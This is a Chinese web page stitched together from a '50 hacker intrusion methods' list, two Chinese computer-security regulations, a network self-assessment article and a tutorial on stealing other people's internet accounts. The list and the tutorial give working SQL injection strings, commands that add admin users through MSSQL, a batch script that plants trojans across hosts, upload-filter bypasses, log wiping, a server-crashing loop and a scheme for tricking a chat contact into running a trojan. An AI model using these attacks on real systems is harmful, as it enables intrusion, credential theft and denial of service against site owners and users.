现在网上的攻击事件越来越多，黑客都是通过什么方法来攻击我们的呢？下面我们给大家总结了黑客入侵网络的五十种方法，让大家做到有备无患。
　　1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络

　　2.搜索栏里输入

　　关键字%'and 1=1 and '%'='

　　关键字%'and 1=2 and '%'='

　　比较不同处 可以作为注入的特征字符

　　3.登陆框用户名和密码输入'or'='or' 漏洞很老但是现在很是遍地都是

　　4.我们先到www.google.com底下搜索一下co net mib ver 1.0

　　密码帐号都是 'or'='or'

　　5.挂马代码

　　6.http://www.wyyfk.com/24小时挂qq工具

　　7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,

　　net localgroup administrators还是可以看出guest是管理员来

　　7.只要敢想,新浪也可入侵 注入点

　　http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59

　　微软官方网站注入点

　　http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=

　　8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上qq大盗木马

　　9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器

　　sql注入后，如何上传木马,

　　文章地址 http://hack123.home4u.china.com/0601.htm

　　10.qq强制聊天代码

　　http://wpa.qq.com/msgrd?v=1&uin=对方的qq号&site=ioshenmue&menu=yes

　　使用方法：把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友，你无须加他为好友就能给 他发qq消息。

　　11. mybbs论坛cookie欺骗 后台备份马

　　12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂qq等

　　用法: 安装： instsrv.exe 服务名称 路径

　　卸载： instsrv.exe 服务名称 remove

　　13.以动网为例数据库查找dv_log,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submit=%cc%ed+%bc%d3 password2=01180017就是他的登陆密码

　　14.搜索的技巧 inurl:网址

　　15.启航工作室wms 5.0网站程序漏洞

　　在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)

　　利用动画看http://soft.77169.com/62/20050530/6824.html

　　16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是asp结尾，所以木马不会变~

　　17.天意商务系统网上依然有 有漏洞 网站具体的样式http://www.wzgcc.org/

　　工具下载www.hack6.com

　　地址栏里，填上天意商务系统的网址就可以了，注意一定要是主页面

　　18.sql注入时工具---internet选项---高级里找到显示友好的错误信息勾去掉

　　不能注入时要第一时间想到%5c暴库

　　19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽，几乎发现不了

　　工具使用方法动画和所有文件

　　http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811

　　20.缺少xp_cmdshell时

　　尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

　　假如恢复不成功,可以尝试直接加用户(针对开3389的)

　　declare @o int

　　exec sp_oacreate 'wscript.shell',@o out

　　exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理员
 
 
21.批量种植木马.bat
 

　　for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中

　　for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间

　　扫描地址.txt里每个主机名一行 用\\开头

　　22.搜索 powered by discuz!4.0.0rc3 开放头像的可利用 工具地址www.hack6.com

　　23.dv7.1用还原数据功能 还原asa木马

　　24.凡人网络购物系统v6.0 可以%5c暴库

　　25.ipb2.0.2漏洞 构造语句

　　$qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 ipb<= 2.0.3论坛注入工具 www.hack6.com有下载

　　26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间

　　27.北京冲qb要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.qq.com/bbn/冲

　　28.搜索 企业网络办公系统 添'or''=' 登陆 在个人邮箱 上传asp木马

　　29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路

　　30.在程序上传shell过程中，程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下： 保存为.asp,程序照样 执行.

　　31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马

　　32.喜欢网页挂马的看看这篇总结文章吧

　　http://77169.com/news/hk/2005060611656.html

　　33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库

　　34.iis6 for windows 2003 enterprise edition 如iis发布目录文件夹包含.asp后辍名.

　　将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.

　　.cer 等后缀的文件夹下都可以运行任何后缀的asp木马

　　35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的ip

　　然后用#clear logg和#clear line vty *删除日志

　　36.搜索关键字:"copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多

　　37.bbsxp的漏洞总结 powered by bbsxp 5.15/licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具：bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马

　　38.学会总结入侵思路http://www.77169.com/news/hk/2005060811688.html

　　39.电脑坏了省去重新安装系统的方法

　　纯dos下执行，

　　xp:copy c:\windows\repair\*.* 到c:\windows\system32\config

　　2k: copy c:\winnt\repair\*.* 到c:\winnt\system32\config

　　40.一般人设置啊拉qq大盗的时候发信和收信都是同一个信箱，因此当我的机子中了此木马后没有立即杀掉进程，而是用内存编辑工具打开它的进程，查找smtp字样，就会找到它的信箱和密码了。只对1.5以前的管用.

　　41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的

　　http://soft.77169.com/62/20050608/6878.html

　　42.有许多管理员用备份的日期做备份数据库的名字

　　比如http://www.hack6.com/bbs/databackup/20050601.mdb

　　43.动网数据库oldusername=%b5%f0%b7%c0&username2=%b5%f0%b7%c0&password2=19841202&adduser=%b5%f0%b7%c0&id=12&submit=%b8%fc+%d0%c2

　　不知道用户名(不是%b8%f0%b7%c0) 转化这个用他本身的页面

　　http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10,11&action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2

　　%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2这句话意思是“填写登录信息”

　　那么就把%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2换成%b5%f0%b7%c0 可以看到用户名

　　44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户
 
 
45.解决tcp/ip筛选 在注册表里有三处，分别是：
 

　　hkey_local_machine\system\controlset001\services\tcpip

　　hkey_local_machine\system\controlset002\services\tcpip

　　hkey_local_machine\system\currentcontrolset\services\tcpip

　　分别用

　　regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip

　　regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip

　　regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip

　　命令来导出注册表项

　　然后把三个文件里的enablesecurityfilters"=dword:00000001，

　　改成enablesecurityfilters"=dword:00000000 再将以上三个文件分别用

　　regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 导入注册表即可

　　46.使chm木马无法在本地运行木马程序 将注册表"hkey_current_u

　　ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004项的值由原来十进制的0改为十六进制的3。

　　47.开3389的5种方法

　　(1)打开记事本，编辑内容如下：

　　echo [components] > c:\sql

　　echo tsenable = on >> c:\sql

　　sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

　　编辑好后存为bat文件，上传至肉鸡，执行。

　　(2) (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05

　　下载地址:www.netsill.com/rots.zip

　　在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：

　　c:\>cscript rots.vbs <目标ip> <用户名> <密码> [服务端口] [/r]

　　如果要对本地使用，ip地址为127.0.0.1或者一个点(用.表示)，用户名和密码都为空(用 ""表示)。

　　(3)djshao正式版5.0

　　解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyx*.**e上传到肉鸡的c:\winnt\temp下，然后 进入c:\winnt\temp目录执行djxyx*.**e解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡 会自动重启!重启后会出现终端服务

　　(4)下载dameware nt utilities 3.66.0.0 注册版

　　地址www.netsill.com/dwmrcw36600.zip

　　安装注册完毕后输入对方ip用户名密码，等待出现是否安装的对话框点是。

　　复制启动后出现对方桌面。

　　在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入 后在启动终端服务上打上勾。确定自动提示重起，重起后ok

　　(5)大家最常用的 3389.exe 下载地址www.hack6.com 把程序上传到肉鸡运行后重启既可

　　48.qq上得到别人的ip

　　一般跟别人聊天 如果是对方先对你说话 那么她的ip显示出来的概率就大

　　当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复

　　还可以用天网防火墙选择上udp数据保检测,即可拦截到对方ip

　　49.挂马js代码document.write('');保存到js页面里 可让所有页面挂马

　　50.让服务器重启

　　写个bat死循环:

　　@echo off

　　:loop1

　　cls

　　start

 
cmd.exe

　　goto loop1

　　保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

　　1、格式化硬盘

　　2、使 WINDOWS 98掉线的代码

　　3、 IE视窗炸弹或者叫让IE不段循环的代码

　　4、造成IE 5.0崩溃的代码

　　5、进入WINDOWS 之前弹出来的对话框代码 到注册表找到 LegalNoticeCaption ， LegalNoticeText 删除

　　6、造成 WINDOWS98 不能关机的代码。 到注册表找到 FastReboot 删除就OK

　　7、让电脑自动启动程序的代码 。 修改方法 找到相应键值http://www.webjx.com/删除

　　8、自动设成主页代码

　　9、修改IE标题栏目。 修改方法 将以下代码中可以换的换成你想换的

　　10、在右键加进网页链接 。修改方法：到注册表找到 MenuExt 把它删除就OK

　　11、IE 的 INTERNET 选项的主页条失去作用变灰的代码。 修改方法，找到 HomePage 删除就OK

　　12、回收站给改了名字的修改方法：打开注册表找到 {645FF040-5081-101B-9F08-00AA002F954E} 修改就 OK

修改回收站的代码

　　13、注册表给锁住了，锁注册表的代码。

　　14、在收藏夹生成文件的代码，将以下代码加进网页后，只要别人一打开就可以自动加进收藏夹

　　15、在桌面生成的网页文件

以下代码就是在桌面上生成一份网页的文件，一按打开的就是你的网页

　　以上代码仅供学习研究使用，请勿使用害人，造成损失本人概不负责，谢谢合作！

（1997年12月11日国务院批准1997年12月30日公安部发布）

第一章　总　则
...............................................................................................................

　　第一条　为了加强对计算机信息网络国际联网的安全保护，维护公共秩序和社会稳定，根据《中华人民共和国计算机信息系统安全保护条例》、《中华人民共和国计算机信息网络国际联网管理暂行规定》和其他法律、行政法规的规定，制定本办法。

　　第二条　中华人民共和国境内的计算机信息网络国际联网安全保护管理，适用本办法。

　　第三条　公安部计算机管理监察机构负责计算机信息网络国际联网的安全保护管理工作。
　　 公安机关计算机管理监察机构应当保护计算机信息网络国际联网的公共安全，维护从事国际联网业务的单位和个人的合法权益和公众利益。

　　第四条　任何单位和个人不得利用国际联网危害国家安全、泄露国家秘密，不得侵犯国家的、社会的、集体的利益和公民的合法权益，不得从事违法犯罪活动。

　　第五条　任何单位和个人不得利用国际联网制作、复制、查阅和传播下列信息：
　　 （一）煽动抗拒、破坏宪法和法律、行政法规实施的；
　　 （二）煽动颠覆国家政权，推翻社会主义制度的；
　　 （三）煽动分裂国家、破坏国家统一的；
　　 （四）煽动民族仇恨、民族歧视，破坏民族团结的；
　　 （五）捏造或者歪曲事实，散布谣言，扰乱社会秩序的；
　　 （六）宣扬封建迷信、淫秽、色情、赌博、暴力、凶杀、恐怖，教唆犯罪的；
　　 （七）公然侮辱他人或者捏造事实诽谤他人的；
　　 （八）损害国家机关信誉的；
　　 （九）其他违反宪法和法律、行政法规的。

　　第六条　任何单位和个人不得从事下列危害计算机信息网络安全的活动：
　　 （一）未经允许，进入计算机信息网络或者使用计算机信息网络资源的；
　　 （二）未经允许，对计算机信息网络功能进行删除、修改或者增加的；
　　 （三）未经允许，对计算机信息网络中存储、处理或者传输的数据和应用程序进行删除、修改或者增加的；
　　 （四）故意制作、传播计算机病毒等破坏性程序的；
　　 （五）其它危害计算机信息网络安全的。

　　第七条　用户的通信自由和通信秘密受法律保护。任何单位和个人不得违反法律规定，利用国际联网侵犯用户的通信自由和通信秘密。

第二章　安全保护责任
...............................................................................................................
　第八条　从事国际联网业务的单位和个人应当接受公安机关的安全监督、检查和指导，如实向公安机关提供有关安全保护的信息、资料及数据文件，协助公安机关查处通过国际联网的计算机信息网络的违法犯罪行为。

　　第九条　国际出口信道提供单位、互联单位的主管部门或者主管单位，应当依照法律和国家有关规定负责国际出入口信道、所属互联网络的安全保护管理工作。

　　第十条　互联单位、接入单位及使用计算机信息网络国际联网的法人和其他组织应当履行下列安全保护职责：
　　 （一）负责本网络的安全保护管理工作，建立健全安全保护管理制度；
　　 （二）落实安全保护技术措施，保障本网络的运行安全和信息安全；
　　 （三）负责对本网络用户的安全教育和培训；
　　 （四）对委托发布信息的单位和个人进行登记，并对所提供的信息内容按照本办法第五条进行审核；
　　 （五）建立计算机信息网络电子公告系统的用户登记和信息管理制度；
　　 （六）发现有本办法第四条、第五条、第六条、第七条所列情形之一的，应当保留有关原始记录，并在二十四小时内向当地公安机关报告；
　　 （七）按照国家有关规定，删除本网络中含有本办法第五条内容的地址、目录或者关闭服务器。

　　第十一条　用户在接入单位办理入网手续时，应当填写用户备案表。备案表由公安部监制。

　　第十二条　互联单位、接入单位、使用计算机信息网络国际联网的法人和其他组织（包括跨省、自治区、直辖市联网的单位和所属的分支机构），应当自网络正式联通之日起三十日内，到所在地的省、自治区、直辖市人民政府公安机关指定的受理机关办理备案手续。
　　 前款所列单位应当负责将接入本网络的接入单位和用户情况报当地公安机关备案，并及时报告本网络中接入单位和用户的变更情况。

　　第十三条　使用公用帐号的注册者应当加强对公用帐号的管理，建立帐号使用登记制度。用户帐号不得转借、转让

　　第十四条　涉及国家事务、经济建设、国防建设、尖端科学技术等重要领域的单位办理备案手续时，应当出具其行政主管部门的审批证明。
　　 前款所列单位的计算机信息网络与国际联网，应当采取相应安全保护措施。

第三章　安全监督
...............................................................................................................

　　第十五条　省、自治区、直辖市公安厅（局），地（市）、县（市）公安局，应当有相应机构负责国际联网的安全保护管理工作。

　　第十六条　公安机关计算机管理监察机构应当掌握互联单位、接入单位和用户的备案情况，建立备案档案，进行备案统计，并按照国家有关规定逐级上报。

　　第十七条　公安机关计算机管理监察机构应当督促互联单位、接入单位及有关用户建立健全安全保护管理制度，监督、检查网络安全保护管理以及技术措施的落实情况。
　　 公安机关计算机管理监察机构在组织安全检查时，有关单位应当派人参加。公安机关计算机管理监察机构对安全检查发现的问题，应当提出改进意见，做出详细记录，存档备查。

　　第十八条　公安机关计算机管理监察机构发现含有本办法第五条所列内容的地址、目录或者服务器时，应当通知有关单位关闭或者删除。

　　第十九条　公安机关计算机管理监察机构应当负责追踪和查处通过计算机信息网络的违法行为和针对计算机信息网络的犯罪案件，对违反本办法第四条、第七条规定的违法犯罪行为，应当按照国家有关规定移送有关部门或者司法机关处理。

第四章　法律责任
...............................................................................................................

　　第二十条　违反法律、行政法规，有本办法第五条、第六条所列行为之一的，由公安机关给予警告，有违法所得的，没收违法所得，对个人可以并处五千元以下的罚款，对单位可以并处一万五千元以下的罚款；情节严重的，并可以给予六个月以内停止联网、停机整顿的处罚，必要时可以建议原发证、审批机构吊销经营许可证或者取消联网资格；构成违反治安管理行为的，依照治安管理处罚条例的规定处罚；构成犯罪的，依法追究刑事责任。

　　第二十一条　有下列行为之一的，由公安机关责令限期改正，给予警告，有违法所得的，没收违法所得；在规定的限制内未改正，对单位的主管负责人员和其他直接责任人员可以并处五千元以下的罚款，对单位可以并处一万五千元以下的罚款；情节严重的，并可以给予六个月以内的停止联网、停机整顿的处罚，必要时可以建议原发证、审批机构吊销经营许可证或者取消联网资格。
　　 （一）未建立安全保护管理制度的；
　　 （二）未采取安全技术保护措施的；
　　 （三）未对网络用户进行安全教育和培训的；
　　 （四）未提供安全保护管理所需信息、资料及数据文件，或者所提供内容不真实的；
　　 （五）对委托其发布的信息内容未进行审核或者对委托单位和个人未进行登记的；
　　 （六）未建立电子公告系统的用户登记和信息管理制度的；
　　 （七）未按照国家有关规定，删除网络地址、目录或者关闭服务器的；
　　 （八）未建立公用帐号使用登记制度的；
　　 （九）转借、转让用户帐号的。

　　第二十二条　违反本办法第四条、第七条规定的，依照有关法律、法规予以处罚。

　　第二十三条　违反本办法第十一条、第十二条规定，不履行备案职责的，由公安机关给予警告或者停机整顿不超过六个月的处罚。

第五章　附则
...............................................................................................................

　　第二十四条　与香港特别行政区和台湾、澳门地区联网的计算机信息网络的安全保护管理，参照本办法执行。

　　第二十五条　本办法自发布之日起施行。

中华人民共和国计算机信息系统安全保护条例

（1994年2月18日中华人民共和国国务院令147号发布）

第一章　总　则
...............................................................................................................

　　第一条　为了保护计算机信息系统的安全，促进计算机的应用和发展，保障社会主义现代化建设的顺利进行，制定本条例。

　　第二条　本条例所称的计算机信息系统，是指由计算机及其相关的和配套的设备、设施（含网络）构成的，按照一定的应用目标和规则对信息进行采集、加工、存储、传输、检索等处理的人机系统。

　　第三条　 计算机信息系统的安全保护，应当保障计算机及其相关的和配套的设备、设施（含网络）的安全，运行环境的安全，保障信息的安全，保障计算机功能的正常发挥，以维护计算机信息系统的安全运行。

　　第四条　计算机信息系统的安全保护工作，重点维护国家事务、经济建设、国防建设、尖端科学技术等重要领域的计算机信息系统的安全。

　　第五条　中华人民共和国境内的计算机信息系统的安全保护，适用本条例。
　　 未联网的微型计算机的安全保护办法，另行制定。

　　第六条　公安部主管全国计算机信息系统安全保护工作。
　　 国家安全部、国家保密局和国务院其他有关部门，在国务院规定的职责范围内做好计算机信息系统安全保护的有关工作。

　　第七条　任何组织或者个人，不得利用计算机信息系统从事危害国家利益、集体利益和公民合法利益的活动，不得危害计算机信息系统的安全。

第二章　安全保护制度
...............................................................................................................

　　第八条　计算机信息系统的建设和应用，应当遵守法律、行政法规和国家其他有关规定。

　　第九条　计算机信息系统实行安全等级保护。安全等级的划分标准和安全等级保护的具体办法，由公安部会同有关部门制定。

　　第十条　计算机机房应当符合国家标准和国家有关规定。
　　 在计算机机房附近施工，不得危害计算机信息系统的安全。

　　第十一条　进行国际联网的计算机信息系统，由计算机信息系统的使用单位报省级以上人民政府公安机关备案。

　　第十二条　运输、携带、邮寄计算机信息媒体进出境的，应当如实向海关申报。

　　第十三条　计算机信息系统的使用单位应当建立健全安全管理制度，负责本单位计算机信息系统的安全保护工作。

　　第十四条　对计算机信息系统中发生的案件，有关使用单位应当在24小时内向当地县级以上人民政府公安机关报告。

　　第十五条　对计算机病毒和危害社会公共安全的其他有害数据的防治研究工作，由公安部归口管理。

　　第十六条　国家对计算机信息系统安全专用产品的销售实行许可证制度。具体办法由公安部会同有关部门制定。

第三章　安全监督
...............................................................................................................

　　第十七条　公安机关对计算机信息系统安全保护工作行使下列监督职权：
　　 （一）监督、检查、指导计算信息系统安全保护工作；
　　 （二）查处危害计算机信息系统安全的违法犯罪案件；
　　 （三）履行计算信息系统安全保护工作的其他监督职责。

　　第十八条　公安机关发现影响计算机信息系统安全的隐患时，应当及时通知使用单位采取安全保护措施。

　　第十九条　公安部在紧急情况下，可以就涉及计算机信息系统安全的特定事项发布专项通令。

第四章　法律责任
...............................................................................................................

　　第二十条　违反本条例的规定，有下列行为之一的，由公安机关处以警告或者停机整顿：
　　 （一）违反计算机信息系统安全等级保护制度，危害计算机信息系统安全的；
　　 （二）违反计算机信息系统国际联网备案制度的；
　　 （三）不按照规定时间报告计算机信息系统中发生的案件的；
　　 （四）接到公安机关要求改进安全状况的通知后，在限期内拒不改进的；
　　 （五）有危害计算机信息系统安全的其他行为的。

　　第二十一条　计算机机房不符合国家标准和国家其他有关规定的，或者在计算机房附近施工危害计算机信息系统安全的，由公安机关会同有关单位进行处理。

　　第二十二条　运输、携带、邮寄计算机信息媒体进出境，不如实向海关申报的，由海关依照《中华人民共和国海关法》和本条例以及其他有关法律、法规的规定处理。

　　第二十三条　故意输入计算机病毒以及其他有害数据危害计算机信息系统安全的，或者未经许可出售计算机信息系统安全专用产品的，由公安机关处以警告或者对个人处以5000元以下的罚款、对单位处以15000元以下的罚款；有违法所得的，除予以没收外，可以处以违法所得1至3倍的罚款。

　　第二十四条　违反本条例的规定，构成违反治安管理行为的，依照《中华人民共和国治安管理处罚条例》的有关规定处罚；构成犯罪的，依法追究刑事责任。

　　第二十五条　任何组织或者个人违反本条例的规定，给国家、集体或者他人财产造成损失的，应当依法承担民事责任。

　　第二十六条　当事人对公安机关依照本条例所做出的具体行政行为不服的，可以依法申请行政复议或者提起行政诉讼。

　　第二十七条　执行本条例的国家公务员利用职权，索取、收受贿赂或者有其他违法、失职行为，构成犯罪的，依法追究刑事责任；尚不构成犯罪的，给予行政处分。

第五章　附则
...............................................................................................................

　　第二十八条　本条例下列用语的含义：
　　 计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。
　　 计算机信息系统安全专用产品，是指用于保护计算机信息系统安全的专用硬件和软件产品。

　　第二十九条　军队的计算机信息系统安全保护工作，按照军队的有关法规执行。

　　第三十条　公安部可以根据本条例制定实施办法。

　　第三十一条　本条例自发布之日起实施。

电脑黑客们总是希望知道尽可能多的信息，比如:是否联网、内部网络的架构以及安全防范措施的状态。一旦那些有经验的黑客盯上了你的网络系统，他们首先会对你的系统进行分析。这就是为什么我们说运用黑客的“游戏规则”是对付黑客的最好办法的原因。以黑客的眼光来审视网络安全性，往往可以发现很多潜在的安全漏洞。这样做不仅提供了审视你网络系统的不同视角，而且让你能够从你的敌人，即黑客的角度来指导你采取最有效的网络安全措施。

　　下面，我们来看一下网络系统分析的过程。这个过程要用到开源工具和相关技术。

　　用开源工具收集信息

　　首先，登录Whois.com网站查找你企业的域名，检索结果将会显示出你的网络系统所使用的DNS服务器。然后再使用一些软件工具，如:nslookup，来进一步挖掘DNS服务器的详细信息。

　　接下来，需要将目标转向于企业的公众Web站点和你能找到的匿名FTP服务器。注意，你现在需要关注的信息主要是:域名、这些域名的IP地址、入侵检测系统的所有信息、用户名、电话号码、电子邮件地址、物理位置、已发布的安全策略、业务合作伙伴的资料、以及新并购企业的信息。

　　此外，在你的上述搜索操作中，一定要特别注意这些网站上已显示的和没有显示的信息。最好，把这些网页存入你的电脑中，然后用记事本程序打开，查看网页的源代码。一般而言，查看网页的源代码可以大量的信息，这也就是某些站点有意对浏览者屏蔽源代码的原因。在源代码文件中，你也许能够了解到网站开发者建站的方式:他们所使用的软 件类型及软件版本、网站以及网页的架构，有时候甚至能够发现一些网站管理员的个人资料。

　　业务合作伙伴的站点或一些新的并购企业的站点往往是黑客入侵的关键点。这些站点是间接入侵目标站点的最佳突破口，容易被网站管理员所忽视，给黑客攻击者制造了大量的机会。如果你在这方面没有足够的警惕性，疏忽大意，很草率地新某个新的业务合作者的网站和你自己的站点联接起来，往往会造成很严重的后果，给你的站点带来极大的安全威胁。在这样的情况下，安全问题比经营问题更加重要，一定要确保安全操作。

　　从外部审视网络

　　有了上述信息收集，你可以开始审视你的网络了。你可以运用路径追踪命令来查看你的网络拓扑结构图和访问控制的相关设置。你会获得大量交换机的特征信息，用来旁路访问控制设备。

　　注意，命令的反馈结果会因为所使用操作系统的不同而有所差别。UNIX操作系统使用UDP，也可以选择使用ICMP;而Windows操作系统默认用ICMP来响应请求(Ping)。

　　你也可以用开源工具管理大量ping sweep、执行TCP/UDP协议扫描、操作系统探测。这样做的目的就是要了解，在那些外部访问者的眼中，你的网络系统的运行状况和一些基本的面 貌、特征。因此，你需要检验你的网络系统，哪些端口和服务对外部访问者是开放的或可用的，外部访问者是否可以了解到你所使用的操作系统和一些程序，极其版本信息。简言 之，就是要了解到你的网络系统究竟对那些外部访问者开放了哪些端口或服务，泄露了哪些站点的基本信息。

　　在你开始上述工作之前，你必须要先获得足够的授权，才能进入整个网络系统并对其进行考察、分析。千万不要将你了解到信息告知那些不怀好意的人。记住:安全防护是一个实 施过程，而不仅仅是一种技术。

如何得到别人的上网帐号和密码

如何得到别人的上网帐号和密码，我在这里介绍几种弱智方法。     方案一：利用特洛伊木马得到帐号。必备工具：NTESPY、PWLVIEW。     优点：只要对方运行了程序就有80%的成功率，而且不需要任何网络入侵知识，只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件，一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高，操作简单而且用不了多长时间是它最大的优点，只是......     缺点：只有一个，那就是如何让对方乖乖的运行你的程序。     提示：先问清你的目标和你是不是在一个城市。     实战演戏：一天，我在X海聊天室里寻找目标，遇见了同在北京的色鹅丢丢。我上前打招呼：丢丢好呀。丢丢说：你好呀。我又说：XXXXXXX（客套话，先和他拉关系）对了，我拿到了一个新程序，要不要看看？丢丢说：好呀，寄给我吧。     哈哈，鱼上钩了！先把诱饵程序改个名，如改成readme之类的东东，然后和一些不相干的东西发过去，然后你让他先运行README。在这插一句，有一位大侠使用此法时，竟然把控制端程序和NETSPY的说明文件一起发了过去，真搞不懂他怎么想的。我对他说，你先运行README，是中文说明。丢丢说：好...咦，怎么没反映呀？(YEAH!)我又说：那你直接运行软件吧。丢丢说：好吧...不错...我说：明天见...开始干活，连上他的机子后，现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98，进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来，放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车，丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网，NETSPY就会通知你，他就再也逃不出你的手掌心了。就算是他换了密码，你也能在2分钟内再把他搞定。     忠告：你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。     方案二：利用ISP的疏忽做文章举。例用工具：EMAILCRK或网络刺客     优点：没什么优点     缺点：要具体情况具体对待，太麻烦     提示：平时多多留神。     譬如，某个ISP给你开好了帐号，然后又画蛇添足的给你一个邮箱，地址是：你的帐号@xxx.net     密码和你的上网密码一样。也就是说，只要你能敲开邮箱的密码就一切OK了。     运行EMAILCRK或网络刺客，套上字典后就等着。一般没有XX个小时搞不定，不成功的可能性很大，而且破解时还必须要上网。你的机子要是快可以开上三四个窗口，套上不同的字典一起破     方案三：侵入邮局主机然后把PASS档抓回来，然后用JOHN或JACK套上字典开始破。     优点：一次可以破出好多帐号，而且如果运气好还能拿到ROOT，这个主机就要归你控制了。而且破解时不用上网，可以好几台机子一起破。     缺点：对于初学者有一定困难，尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大，情节严重且性质恶劣，一定要慎重对待。     由于介绍此类的教学文章比较多，我就不班门弄斧了。           哈哈，我来说说最简单的入侵方法。其实入侵大体的原理相同，主要是利用系统的漏洞（BUG）来做文章。     只不过有的网站漏洞难找有的好找而已。一个好的黑客，就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。     有一天，我去XX热线申请主页，发现那里采用的是机器自动回信，信的大概格式如下：           ------------------------------           XXX，你好（XX是你在表格上填的名字）     你在XX热线的主页空间已开通     帐户名：XXX 密码：11     -----------XX热线     电话：XXXX-XXXXXXXX     ------------------------------           好了，由于是机器回信，所以那里所有人的初始密码都是11，而且该热线要更改密码要TELNET到邮局主机去改，有许多网友并没有接触过如何T主机，所以他们使用的还是初始密码11。     开始干活了，打开FTP软件，输入XX热线的IP，密码11，然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看，先试试AAAA，。。。没成功，再换一个，AABB。。。还是不行。哈哈，这个用户名短，没准能行。输入AA。。。进去了。寄下用户名然后继续试，ABC。。。又成功了，看来没改密码的人很多呀。试几个就行了，现在，你已经拥有这些帐户的控制权了。     上面的这个栗子很简单，一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱，而且还未必能成功。即使成功了，你不改它实在无趣，改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句，把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室，看谁不听话就炸他，同样很过瘾的！                 如何获得第一个帐号           